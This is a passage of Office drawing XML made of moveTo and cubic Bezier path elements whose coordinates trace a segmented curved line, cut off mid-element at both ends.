                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="1495"/>
                    <a:pt x="90" y="1497"/>
                    <a:pt x="90" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="1505"/>
                    <a:pt x="96" y="1511"/>
                    <a:pt x="99" y="1517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="1519"/>
                    <a:pt x="102" y="1520"/>
                    <a:pt x="104" y="1519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1518"/>
                    <a:pt x="107" y="1516"/>
                    <a:pt x="106" y="1514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1514"/>
                    <a:pt x="106" y="1514"/>
                    <a:pt x="106" y="1514"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="123" y="1550"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="1544"/>
                    <a:pt x="117" y="1538"/>
                    <a:pt x="114" y="1532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="1530"/>
                    <a:pt x="111" y="1529"/>
                    <a:pt x="109" y="1530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="1531"/>
                    <a:pt x="106" y="1533"/>
                    <a:pt x="107" y="1535"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="1541"/>
                    <a:pt x="113" y="1547"/>
                    <a:pt x="116" y="1553"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="1555"/>
                    <a:pt x="120" y="1556"/>
                    <a:pt x="122" y="1555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="1554"/>
                    <a:pt x="124" y="1552"/>
                    <a:pt x="123" y="1550"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="1585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="1579"/>
                    <a:pt x="136" y="1573"/>
                    <a:pt x="133" y="1567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="1565"/>
                    <a:pt x="129" y="1565"/>
                    <a:pt x="127" y="1566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="1567"/>
                    <a:pt x="124" y="1569"/>
                    <a:pt x="125" y="1571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="1577"/>
                    <a:pt x="132" y="1583"/>
                    <a:pt x="135" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="1591"/>
                    <a:pt x="139" y="1591"/>
                    <a:pt x="141" y="1590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="1589"/>
                    <a:pt x="143" y="1587"/>
                    <a:pt x="142" y="1585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="1585"/>
                    <a:pt x="142" y="1585"/>
                    <a:pt x="142" y="1585"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="1619"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="1614"/>
                    <a:pt x="155" y="1608"/>
                    <a:pt x="152" y="1602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="1600"/>
                    <a:pt x="148" y="1600"/>
                    <a:pt x="146" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="1602"/>
                    <a:pt x="144" y="1604"/>
                    <a:pt x="145" y="1606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="1612"/>
                    <a:pt x="152" y="1618"/>
                    <a:pt x="155" y="1623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="1625"/>
                    <a:pt x="159" y="1626"/>
                    <a:pt x="161" y="1625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="1624"/>
                    <a:pt x="163" y="1621"/>
                    <a:pt x="162" y="1619"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183" y="1653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="1647"/>
                    <a:pt x="176" y="1642"/>
                    <a:pt x="173" y="1636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="1634"/>
                    <a:pt x="169" y="1634"/>
                    <a:pt x="167" y="1635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="1636"/>
                    <a:pt x="165" y="1639"/>
                    <a:pt x="166" y="1640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="1646"/>
                    <a:pt x="173" y="1652"/>
                    <a:pt x="177" y="1657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="1659"/>
                    <a:pt x="180" y="1660"/>
                    <a:pt x="182" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="1657"/>
                    <a:pt x="185" y="1655"/>
                    <a:pt x="183" y="1653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="1653"/>
                    <a:pt x="183" y="1653"/>
                    <a:pt x="183" y="1653"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="1686"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1680"/>
                    <a:pt x="198" y="1675"/>
                    <a:pt x="195" y="1669"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="1668"/>
                    <a:pt x="191" y="1667"/>
                    <a:pt x="189" y="1668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="1670"/>
                    <a:pt x="187" y="1672"/>
                    <a:pt x="188" y="1674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="1679"/>
                    <a:pt x="196" y="1685"/>
                    <a:pt x="200" y="1690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1692"/>
                    <a:pt x="203" y="1693"/>
                    <a:pt x="205" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="1690"/>
                    <a:pt x="207" y="1687"/>
                    <a:pt x="206" y="1686"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="1718"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="1712"/>
                    <a:pt x="222" y="1707"/>
                    <a:pt x="218" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="1700"/>
                    <a:pt x="214" y="1700"/>
                    <a:pt x="212" y="1701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="1702"/>
                    <a:pt x="210" y="1705"/>
                    <a:pt x="211" y="1707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="1712"/>
                    <a:pt x="219" y="1717"/>
                    <a:pt x="224" y="1722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="1724"/>
                    <a:pt x="227" y="1725"/>
                    <a:pt x="229" y="1723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="1722"/>
                    <a:pt x="231" y="1719"/>
                    <a:pt x="230" y="1718"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="255" y="1749"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="1744"/>
                    <a:pt x="246" y="1738"/>
                    <a:pt x="242" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="1732"/>
                    <a:pt x="238" y="1731"/>
                    <a:pt x="237" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="1734"/>
                    <a:pt x="235" y="1737"/>
                    <a:pt x="236" y="1738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="1743"/>
                    <a:pt x="244" y="1749"/>
                    <a:pt x="249" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="1755"/>
                    <a:pt x="253" y="1756"/>
                    <a:pt x="254" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="1753"/>
                    <a:pt x="256" y="1750"/>
                    <a:pt x="255" y="1749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="1749"/>
                    <a:pt x="255" y="1749"/>
                    <a:pt x="255" y="1749"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="1779"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="1774"/>
                    <a:pt x="272" y="1769"/>
                    <a:pt x="268" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="1762"/>
                    <a:pt x="264" y="1762"/>
                    <a:pt x="262" y="1763"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="1765"/>
                    <a:pt x="260" y="1767"/>
                    <a:pt x="262" y="1769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="1774"/>
                    <a:pt x="271" y="1779"/>
                    <a:pt x="275" y="1784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="1786"/>
                    <a:pt x="279" y="1786"/>
                    <a:pt x="281" y="1784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="1783"/>
                    <a:pt x="282" y="1780"/>
                    <a:pt x="281" y="1779"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="1808"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="1803"/>
                    <a:pt x="299" y="1798"/>
                    <a:pt x="294" y="1793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1792"/>
                    <a:pt x="290" y="1792"/>
                    <a:pt x="289" y="1793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="1795"/>
                    <a:pt x="287" y="1797"/>
                    <a:pt x="289" y="1799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1804"/>
                    <a:pt x="298" y="1809"/>
                    <a:pt x="303" y="1813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="1815"/>
                    <a:pt x="307" y="1815"/>
                    <a:pt x="308" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="1812"/>
                    <a:pt x="310" y="1809"/>
                    <a:pt x="308" y="1808"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="337" y="1836"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="1831"/>
                    <a:pt x="327" y="1827"/>
                    <a:pt x="322" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1820"/>
                    <a:pt x="318" y="1821"/>
                    <a:pt x="317" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="1824"/>
                    <a:pt x="315" y="1826"/>
                    <a:pt x="317" y="1828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1832"/>
                    <a:pt x="326" y="1837"/>
                    <a:pt x="331" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="1843"/>
                    <a:pt x="335" y="1843"/>
                    <a:pt x="337" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="1840"/>
                    <a:pt x="338" y="1837"/>
                    <a:pt x="337" y="1836"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="1863"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="1859"/>
                    <a:pt x="356" y="1854"/>
                    <a:pt x="351" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="1848"/>
                    <a:pt x="347" y="1848"/>
                    <a:pt x="345" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="1851"/>
                    <a:pt x="344" y="1854"/>
                    <a:pt x="346" y="1855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="1860"/>
                    <a:pt x="356" y="1865"/>
                    <a:pt x="361" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="1870"/>
                    <a:pt x="365" y="1870"/>
                    <a:pt x="366" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="1867"/>
                    <a:pt x="368" y="1864"/>
                    <a:pt x="366" y="1863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="1863"/>
                    <a:pt x="366" y="1863"/>
                    <a:pt x="366" y="1863"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="396" y="1889"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="1885"/>
                    <a:pt x="386" y="1880"/>
                    <a:pt x="381" y="1876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="1875"/>
                    <a:pt x="377" y="1875"/>
                    <a:pt x="375" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="1878"/>
                    <a:pt x="374" y="1881"/>
                    <a:pt x="376" y="1882"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="1887"/>
                    <a:pt x="386" y="1891"/>
                    <a:pt x="391" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="1896"/>
                    <a:pt x="395" y="1896"/>
                    <a:pt x="397" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="1893"/>
                    <a:pt x="398" y="1890"/>
                    <a:pt x="396" y="1889"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="1914"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="422" y="1910"/>
                    <a:pt x="417" y="1906"/>
                    <a:pt x="412" y="1901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="1900"/>
                    <a:pt x="408" y="1900"/>
                    <a:pt x="406" y="1902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="1904"/>
                    <a:pt x="405" y="1906"/>
                    <a:pt x="407" y="1908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="1912"/>
                    <a:pt x="417" y="1916"/>
                    <a:pt x="423" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="1921"/>
                    <a:pt x="427" y="1921"/>
                    <a:pt x="428" y="1919"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="1917"/>
                    <a:pt x="429" y="1915"/>
                    <a:pt x="428" y="1914"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="1937"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="454" y="1933"/>
                    <a:pt x="449" y="1929"/>
                    <a:pt x="444" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442" y="1924"/>
                    <a:pt x="439" y="1925"/>
                    <a:pt x="438" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="1928"/>
                    <a:pt x="437" y="1931"/>
                    <a:pt x="439" y="1932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="444" y="1936"/>
                    <a:pt x="450" y="1940"/>
                    <a:pt x="455" y="1944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="1945"/>
                    <a:pt x="460" y="1945"/>
                    <a:pt x="461" y="1943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462" y="1941"/>
                    <a:pt x="462" y="1938"/>
                    <a:pt x="460" y="1937"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="1960"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="1956"/>
                    <a:pt x="482" y="1952"/>
                    <a:pt x="476" y="1949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="475" y="1947"/>
                    <a:pt x="472" y="1948"/>
                    <a:pt x="471" y="1950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="1951"/>
                    <a:pt x="470" y="1954"/>
                    <a:pt x="472" y="1955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="1959"/>
                    <a:pt x="483" y="1963"/>
                    <a:pt x="489" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="491" y="1967"/>
                    <a:pt x="493" y="1967"/>
                    <a:pt x="494" y="1965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="1963"/>
                    <a:pt x="495" y="1961"/>
                    <a:pt x="493" y="1960"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="1960"/>
                    <a:pt x="493" y="1960"/>
                    <a:pt x="493" y="1960"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="1981"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="1977"/>
                    <a:pt x="516" y="1974"/>
                    <a:pt x="510" y="1970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1969"/>
                    <a:pt x="506" y="1970"/>
                    <a:pt x="504" y="1972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="1973"/>
                    <a:pt x="504" y="1976"/>
                    <a:pt x="506" y="1977"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="511" y="1981"/>
                    <a:pt x="517" y="1984"/>
                    <a:pt x="523" y="1988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="1989"/>
                    <a:pt x="527" y="1988"/>
                    <a:pt x="528" y="1986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="529" y="1984"/>
                    <a:pt x="529" y="1982"/>
                    <a:pt x="527" y="1981"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="527" y="1981"/>
                    <a:pt x="527" y="1981"/>
                    <a:pt x="527" y="1981"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="562" y="2000"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="1997"/>
                    <a:pt x="550" y="1994"/>
                    <a:pt x="544" y="1991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="542" y="1990"/>
                    <a:pt x="540" y="1990"/>
                    <a:pt x="539" y="1992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="538" y="1994"/>
                    <a:pt x="538" y="1997"/>
                    <a:pt x="540" y="1998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="546" y="2001"/>
                    <a:pt x="552" y="2004"/>
                    <a:pt x="558" y="2007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="2009"/>
                    <a:pt x="562" y="2008"/>
                    <a:pt x="563" y="2006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="564" y="2004"/>
                    <a:pt x="564" y="2002"/>
                    <a:pt x="562" y="2000"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="597" y="2019"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="591" y="2016"/>
                    <a:pt x="585" y="2013"/>
                    <a:pt x="579" y="2010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="577" y="2009"/>
                    <a:pt x="575" y="2010"/>
                    <a:pt x="574" y="2012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="573" y="2014"/>
                    <a:pt x="574" y="2016"/>
                    <a:pt x="576" y="2017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="582" y="2020"/>
                    <a:pt x="588" y="2023"/>
                    <a:pt x="594" y="2026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="596" y="2027"/>
                    <a:pt x="598" y="2026"/>
                    <a:pt x="599" y="2024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="600" y="2022"/>
                    <a:pt x="599" y="2020"/>
                    <a:pt x="597" y="2019"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="633" y="2036"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="627" y="2033"/>
                    <a:pt x="621" y="2031"/>
                    <a:pt x="615" y="2028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="613" y="2027"/>
                    <a:pt x="611" y="2028"/>
                    <a:pt x="610" y="2030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="609" y="2032"/>
                    <a:pt x="610" y="2034"/>
                    <a:pt x="612" y="2035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="618" y="2038"/>
                    <a:pt x="624" y="2041"/>
                    <a:pt x="630" y="2043"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="632" y="2044"/>
                    <a:pt x="634" y="2043"/>
                    <a:pt x="635" y="2041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="636" y="2039"/>
                    <a:pt x="635" y="2037"/>
                    <a:pt x="633" y="2036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="633" y="2036"/>
                    <a:pt x="633" y="2036"/>
                    <a:pt x="633" y="2036"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="670" y="2052"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="664" y="2049"/>
                    <a:pt x="658" y="2047"/>
                    <a:pt x="652" y="2044"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="650" y="2043"/>
                    <a:pt x="647" y="2044"/>
                    <a:pt x="646" y="2046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="645" y="2048"/>
                    <a:pt x="646" y="2051"/>
                    <a:pt x="648" y="2051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="655" y="2054"/>
                    <a:pt x="661" y="2057"/>
                    <a:pt x="667" y="2059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="669" y="2060"/>
                    <a:pt x="671" y="2059"/>
                    <a:pt x="672" y="2057"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="673" y="2055"/>
                    <a:pt x="672" y="2053"/>
                    <a:pt x="670" y="2052"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="707" y="2066"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="701" y="2064"/>
                    <a:pt x="695" y="2062"/>
                    <a:pt x="689" y="2059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="687" y="2058"/>
                    <a:pt x="684" y="2059"/>
                    <a:pt x="684" y="2061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="683" y="2064"/>
                    <a:pt x="684" y="2066"/>
                    <a:pt x="686" y="2067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="692" y="2069"/>
                    <a:pt x="698" y="2071"/>
                    <a:pt x="705" y="2074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="707" y="2074"/>
                    <a:pt x="709" y="2073"/>
                    <a:pt x="710" y="2071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="711" y="2069"/>
                    <a:pt x="710" y="2067"/>
                    <a:pt x="707" y="2066"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="745" y="2079"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="739" y="2077"/>
                    <a:pt x="733" y="2075"/>
                    <a:pt x="726" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="2072"/>
                    <a:pt x="722" y="2073"/>
                    <a:pt x="721" y="2075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="2077"/>
                    <a:pt x="722" y="2080"/>
                    <a:pt x="724" y="2080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="730" y="2083"/>
                    <a:pt x="736" y="2085"/>
                    <a:pt x="743" y="2087"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="745" y="2087"/>
                    <a:pt x="747" y="2086"/>
                    <a:pt x="748" y="2084"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="749" y="2082"/>
                    <a:pt x="747" y="2080"/>
                    <a:pt x="745" y="2079"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="784" y="2091"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="2089"/>
                    <a:pt x="771" y="2087"/>
                    <a:pt x="764" y="2085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="762" y="2084"/>
                    <a:pt x="760" y="2086"/>
                    <a:pt x="759" y="2088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="759" y="2090"/>
                    <a:pt x="760" y="2092"/>
                    <a:pt x="762" y="2093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="769" y="2095"/>
                    <a:pt x="775" y="2096"/>
                    <a:pt x="781" y="2098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="784" y="2099"/>
                    <a:pt x="786" y="2098"/>
                    <a:pt x="786" y="2095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="787" y="2093"/>
                    <a:pt x="786" y="2091"/>
                    <a:pt x="784" y="2091"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="822" y="2101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="816" y="2099"/>
                    <a:pt x="809" y="2097"/>
                    <a:pt x="803" y="2096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="801" y="2095"/>
                    <a:pt x="799" y="2096"/>
                    <a:pt x="798" y="2099"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797" y="2101"/>
                    <a:pt x="799" y="2103"/>
                    <a:pt x="801" y="2103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="807" y="2105"/>
                    <a:pt x="814" y="2107"/>
                    <a:pt x="820" y="2108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="823" y="2109"/>
                    <a:pt x="825" y="2108"/>
                    <a:pt x="825" y="2105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="826" y="2103"/>
                    <a:pt x="824" y="2101"/>
                    <a:pt x="822" y="2101"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="861" y="2109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="2108"/>
                    <a:pt x="848" y="2106"/>
                    <a:pt x="842" y="2105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="840" y="2105"/>
                    <a:pt x="837" y="2106"/>
                    <a:pt x="837" y="2108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="836" y="2110"/>
                    <a:pt x="838" y="2112"/>
                    <a:pt x="840" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="846" y="2114"/>
                    <a:pt x="853" y="2116"/>
                    <a:pt x="860" y="2117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="862" y="2117"/>
                    <a:pt x="864" y="2116"/>
                    <a:pt x="864" y="2114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="865" y="2112"/>
                    <a:pt x="863" y="2109"/>
                    <a:pt x="861" y="2109"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="900" y="2116"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="2115"/>
                    <a:pt x="887" y="2114"/>
                    <a:pt x="881" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="879" y="2112"/>
                    <a:pt x="877" y="2114"/>
